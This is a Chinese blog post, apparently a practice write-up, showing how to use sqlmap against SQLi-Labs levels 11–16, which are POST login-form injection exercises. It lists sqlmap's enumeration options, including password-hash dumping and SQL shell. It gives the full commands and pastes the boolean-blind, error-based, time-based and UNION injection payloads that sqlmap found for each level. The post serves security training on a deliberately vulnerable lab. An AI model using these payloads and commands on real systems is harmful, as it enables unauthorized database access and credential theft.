sqlmap刷sqllibs_02-post型-11-16

最新推荐文章于 2024-07-24 23:19:51 发布
最新推荐文章于 2024-07-24 23:19:51 发布
阅读量500 收藏
点赞数 1
分类专栏: # sqlmap试炼场 # Sqllibs_master
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901038/article/details/107628956
版权

11、less11-Error Based- String

bp抓包,然后右键将我抓到的包保存为txt格式。
在这里插入图片描述

11.1、枚举–信息获取

在上一篇文章中我们讨论的主要是跑数据库的一般步骤,接下来,我们具体讨论一下通过枚举参数我们可以获取到的信息。

在这里我们使用的参数是 - r即从一个文件中载入http请求

首先,我们先把枚举参数列出来,然后再逐一复现吧。

Enumeration(枚举):
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己
的 SQL 语句。

-b, --banner 检索数据库管理系统的标识
--current-user 检索数据库管理系统当前用户
--current-db 检索数据库管理系统当前数据库
--is-dba 检测 DBMS 当前用户是否 DBA

--users 枚举数据库管理系统用户
--passwords 枚举数据库管理系统用户密码哈希
--privileges 枚举数据库管理系统用户的权限
--roles 枚举数据库管理系统用户的角色

--dbs 枚举数据库管理系统数据库
--tables 枚举的 DBMS 数据库中的表
--columns 枚举 DBMS 数据库表列
--dump 转储数据库管理系统的数据库中的表项
--dump-all 转储所有的 DBMS 数据库表中的条目
--search 搜索列(S),表(S)和/或数据库名称(S)

-D DB 要进行枚举的数据库名
-T TBL 要进行枚举的数据库表
-C COL 要进行枚举的数据库列
-U USER 用来进行枚举的数据库用户
--exclude-sysdbs 枚举表时排除系统数据库

--start=LIMITSTART 第一个查询输出进入检索
--stop=LIMITSTOP 最后查询的输出进入检索
--first=FIRSTCHAR 第一个查询输出字的字符检索
--last=LASTCHAR 最后查询的输出字字符检索

--sql-query=QUERY 要执行的 SQL 语句
--sql-shell 提示交互式 SQL 的 shell

接下来,我们以本关为例,对上述参数进行注意复现!start!!!

11.1.1、枚举当前数据库及用户信息

-b, --banner 检索数据库管理系统的标识
--current-user 检索数据库管理系统当前用户
--current-db 检索数据库管理系统当前数据库
--is-dba 检测 DBMS 当前用户是否 DBA (dba:数据库管理员,因此这条语句可以用来查看用户权限)

将上面参数整合后如下:

C:\Python27\sqlmap>sqlmap.py -r "C:\Users\20544\Desktop\sqlmap.txt" --level=5 --risk=3 --banner --current-user  --current-db --is-dba

执行结果如下:
在这里插入图片描述

11.1.2、枚举系统用户信息

--users 枚举数据库管理系统用户
--passwords 枚举数据库管理系统用户密码哈希
--privileges 枚举数据库管理系统用户的权限
--roles 枚举数据库管理系统用户的角色

语句整合后,如下:

C:\Python27\sqlmap>sqlmap.py -r "C:\Users\20544\Desktop\sqlmap.txt" --level=5 --risk=3 --users --passwords --privileges --roles

执行结果如下:

数据库管理系统用户-- --users
在这里插入图片描述
数据库管理系统用户密码哈希–--passwords
在这里插入图片描述
数据库管理系统用户权限–--privileges
在这里插入图片描述
数据库管理系统用户角色–--roles
在这里插入图片描述

11.1.3、枚举爆破参数

这个在上一篇文章中大致讲解了以下参数的使用详情请参考链接:
sqlmap刷sqllibs_01

  • 1、需要获取的参数
--dbs 枚举数据库管理系统数据库
--tables 枚举的 DBMS 数据库中的表
--columns 枚举 DBMS 数据库表列
--dump 转储数据库管理系统的数据库中的表项
--dump-all 转储所有的 DBMS 数据库表中的条目
--search 搜索列(S),表(S)和/或数据库名称(S)
  • 2、当前已经获得的参数
-D DB 要进行枚举的数据库名
-T TBL 要进行枚举的数据库表
-C COL 要进行枚举的数据库列
-U USER 用来进行枚举的数据库用户
--exclude-sysdbs 枚举表时排除系统数据库

11.4、位置相关

--start=LIMITSTART 第一个查询输出进入检索
--stop=LIMITSTOP 最后查询的输出进入检索
--first=FIRSTCHAR 第一个查询输出字的字符检索
--last=LASTCHAR 最后查询的输出字字符检索

11.5、自定义语句

--sql-query=QUERY 要执行的 SQL 语句
--sql-shell 提示交互式 SQL 的 shell

11.2、闯关索引

C:\Python27\sqlmap>sqlmap.py -r "C:\Users\20544\Desktop\sqlmap.txt" --level=5 --risk=3 --dbs

数据库给出的payload如下:

sqlmap identified the following injection point(s) with a total of 502 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: uname=1' OR NOT 4607=4607-- CPuf&passwd=1&submit=Submit

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: uname=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71626a7671,(SELECT (ELT(8801=8801,1))),0x717a6a7071,0x78))s), 8446744073709551610, 8446744073709551610)))-- ZeWx&passwd=1&submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 6240 FROM (SELECT(SLEEP(5)))UoeA)-- YZOu&passwd=1&submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=1' UNION ALL SELECT CONCAT(0x71626a7671,0x717a6b7a6b6a7173476a6751457166487677754b455455435a6a725a4b6167576e77504b6d6a4764,0x717a6a7071),NULL-- -&passwd=1&submit=Submit

---

12、less12-Error Based- Double quotes- String

本关同于第11关,具体语句不一一赘述了
PS:有的时候直接 - r 可能跑不出来,所以就要尝试着加高一下level水平。

C:\Python27\sqlmap>sqlmap.py -r "C:\Users\20544\Desktop\sqlmap.txt" --level=5 --risk=3 --dbs --current-user  --current-db --is-dba

下面为sqlmap给出的payload:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uname=1") OR NOT 4342=4342#&passwd=1&submit=Submit

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: uname=1") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b716b71,(SELECT (ELT(7787=7787,1))),0x7170786b71,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("bRDk"="bRDk&passwd=1&submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1") AND (SELECT 2023 FROM (SELECT(SLEEP(5)))fdOn) AND ("aSeY"="aSeY&passwd=1&submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: uname=1") UNION ALL SELECT CONCAT(0x716b716b71,0x6d6b6f757366756d6468764c5955784d696c4459426f466c61424343456d4b4f52664454546e6a6d,0x7170786b71),NULL#&passwd=1&submit=Submit
---

13、less13-Double Injection- String- with twist

本关同于第11关,具体语句不一一赘述了。
下面为sqlmap给出的payload:

sqlmap identified the following injection point(s) with a total of 1611 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: uname=11') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b706a71,(SELECT (ELT(1660=1660,1))),0x716b767671,0x78))s), 8446744073709551610, 8446744073709551610)))-- nvej&passwd=11&submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=11') AND (SELECT 3685 FROM (SELECT(SLEEP(5)))eavv)-- IpuU&passwd=11&submit=Submit
---

14、less14-Double Injection- Double quotes- String

本关同于第11关,具体语句不一一赘述了。
下面为sqlmap给出的payload:

sqlmap identified the following injection point(s) with a total of 1611 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: uname=12" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171626b71,(SELECT (ELT(3785=3785,1))),0x7178706b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- EBWp&passwd=12&submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=12" AND (SELECT 1867 FROM (SELECT(SLEEP(5)))MSqy)-- xKhK&passwd=12&submit=Submit
---

15、less15-Blind- Boolian Based- String

本关同于第11关,具体语句不一一赘述了。
下面为sqlmap给出的payload:

sqlmap identified the following injection point(s) with a total of 4458 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=11' AND (SELECT 9019 FROM (SELECT(SLEEP(5)))czKU)-- lSfH&passwd=11&submit=Submit
---

16、less16-Blind- Time Based- Double quotes- String

本关同于第11关,具体语句不一一赘述了。
下面为sqlmap给出的payload:

sqlmap identified the following injection point(s) with a total of 4464 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1111") AND (SELECT 6341 FROM (SELECT(SLEEP(5)))EkVV) AND ("NvOs"="NvOs&passwd=11&submit=Submit
---
xor0ne_10_01
关注
专栏目录
sqlmapSQLi-LABS靶场 1-10关
小明师傅博客
06-04 8201
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
sqlmapsqllibs_01-1-10
Xor0ne
07-27 973
在使用前,我们先大致介绍一下sqlmap可能的用处。 以下来自于: 版权声明:本文为CSDN博主「小明师傅」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/qq_24030907/article/details/106541411 0、清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purg
sql-libs通关详解
最新发布
hanjinming110的博客
07-24 1425
sql-libs靶场的打靶过程
使用sqlmapsqli-less-2 的题解
weixin_44352058的博客
05-02 331
1.检测注入点 sqlmap.py -u http://localhost/sqli/Less-2/?id=1 2.查看数据库 sqlmap.py -u http://localhost/sqli/Less-2/?id=1 –dbs 3.查看数据库中的表 sqlmap.py -u http://localhost/sqli/Less-2/?id=1 -D security –tab...
网络安全-sqlmap实战之sqlilabs-Less11
关注网络安全、云原生安全
07-10 2223
目录 类 -dbs枚举数据库 --tables枚举数据库表 --columns枚举列 --dump枚举数据 查看源代码 类 基于错误-字符串 登陆成功 当然,因为之前已经通过sql注入看到了数据库,正常情况下应该是失败,而且网站一般有验证码。 登录失败 错误回显 sql语句猜测 select * from users where username="参数" and password="参数" LIMIT 0,1 -dbs枚举数据库 使用-o参数优化,--batch
sqlmap的使用之sql-lab
weixin_43803070的博客
05-08 2305
splmap的五种独特的sql注入技术: 基于布尔类的盲注 基于时间的盲注 基于报错的盲注 联合查询注入 堆查询注入 在进行注入之前要说明两点: 第一我们在进行注入的时候需要把url中的127.0.0.1改为本机的ip 第二在注入的时候一定要带上参数。 接下来我们对sql-lab进行sqlmap使用: 0x01 Less-1 一、sqlmap.py -u http://192...
sqlmap使用教程(sqli-labs1-10详解)
小同的博客
05-22 4642
-u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 --dbs 列出所有的数据库 --current-db 列出当前数据库 --tables 列出当前的表 --columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列 --dump 获取字段中的数据 --batch 自动选择yes --smart 启发式快速判断,节约浪费时间 --forms 尝试使用post注入 -r 加载文件中的HTTP请求(本地保存的请
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 718
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 721
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs第十三和十四关(post请求-报错盲注)
qq_42266432的博客
08-24 667
一上来,先加个单引号探探路,有sql报错回显 在单引号后继续加上and 1,试图让sql报错显示更多信息,从near ‘’) and password=(‘1’) LIMIT 0,1’ at line 1可以判断,这关就用单引号加括号了,没什么意思 注入’)却发现,页面没有回显,于是这里考虑使用报错盲注或者布尔盲注,时间延时说不定也行,先采用报错盲注吧 先使用order by 拆解出字段数为2 爆出当前数据库 uname=uname=1') and 1 union select 1,updatex.
SQL注入类Sqlmap安装与使用详解(附Sqlmap安装包)
悦分享
09-06 289
SQL注入是一种恶意用户通过Web页面使用SQL语句注入SQL命令的技术。攻击者可以绕过用户认证和访问限制,修改、删除数据库中的数据。在某些情况下,SQL注入甚至可以用来执行操作系统级的命令,攻击者入侵内网可能带来更大的威胁。
sql_lib.zip
05-03
Flink SQL Client操作kafka、es、mysql时所需的jar文件,下载后放在flink目录下,在启动Flink SQL Client时通过-l参数指定
SQL-libs Less-11
AgonYAN的博客
07-14 217
SQL-libs Less-11
sqllibs-Less11-16
Xor0ne
07-12 605
文章目录11.Less-11-Error Based11.1、报错尝试11.2、代码分析12.Less12-Error-based-Double quotes12.1、报错测试12.2、代码分析13.Less13-Double Injection-String-with twist13.1、报错测试13.2、代码分析14.Less14-Double Injection-Double quotes14.1、报错尝试14.2、代码分析15.Less15-Blind-Boolean Based15.1、报错尝试1
Sqlilabs11-22关卡详解(Post式)
爱吃仡坨的Blog
10-18 957
我们随便输入一个内容,只有一个登陆失败的图片并没有带有sql语法的报错回显通过构造一个错误的语法ggbond'单引号;发现有sql语句的错误回显;我们可以判断出此登陆界面是通过单引号闭合的构造一个恒成立的sql语句,发现爆出其登陆的用户名和密码通过orderby函数判断出有两个字段通过union查询 爆出其字段所在位置,如图所示。
手工post注入mysql_SQL手工注入
weixin_35713476的博客
02-04 1028
转自http://www.vuln.cn/9027我是技术不高,但我能带你入门我遇到过无数人曾来像我表示自己想学网络安全,走了很多弯路,求师被骗过很多钱。这样的人我没办法帮助太多,限于时间精力与能力,帮得了1个帮不了100个,再说我也不是昔日的雷锋了。如今我也基本上不做渗透了,回过头看到几年前自己笔记中有一些注入笔记,虽然我没有大牛水平,没有高端操作,但我希望我能把我仅有的一些技术与资源,能够最大...
sql-labs通关记录(11-17)
qq_36676979的博客
04-22 240
less-11 发现一个登录框,第一反应是弱口令,先试试。 接下来检测下sql注入。使用bp抓包,看字节数。 正常的字节数,1523 加单引号’ 单引号闭合,字节数正常,说明存在字符注入。 先看看显示位,3报错,试试2 说明有两个显示位,使用联合注入。 1'union select 1,database()# 后面就按部就班的来。 爆表 1'union select 1,group_conca...
sqli-libs系列
qq_43511094的博客
12-31 1625
sqllibs information_schema中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件 information_schema库中常用的表 schemate 这个表就很强,可以显示所有数据库的信息,注意,是数据库,不是表,show databases 就是从这个表中获取数据,schema_name就
sql-libs 手工注入步骤
m0_59035933的博客
08-13 1531
一.首先输入',发现有报错,很高兴的事情,说明有漏洞。 1.程序没有过滤特殊字符',提交的内容接过了sql引擎解析 2.回显的内容看到了MYSQL字样 二.输入:1’ or ‘1’=‘1 出现了大量信息,但是因为这一关的代码只能输出一组数据,所以看到的也只有一组数据 三.我们希望得到数据库的其他关键数据,所以要用到union联合查询。而联合查询的关键是需要知道主查询列数,因为联合查询需要和主查询的列数相同,不然会出现报错。所以我们使用ord...
SQLMap 的 --sql-shell 和 --os-shell 的区别
05-20
SQLMap是一款自动化的SQL注入工具,可以通过一些选项来执行不同的操作。其中,--sql-shell和--os-shell是两个不同的选项,它们的区别如下: 1. --sql-shell:这个选项会在目标数据库中打开一个交互式的SQL shell,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值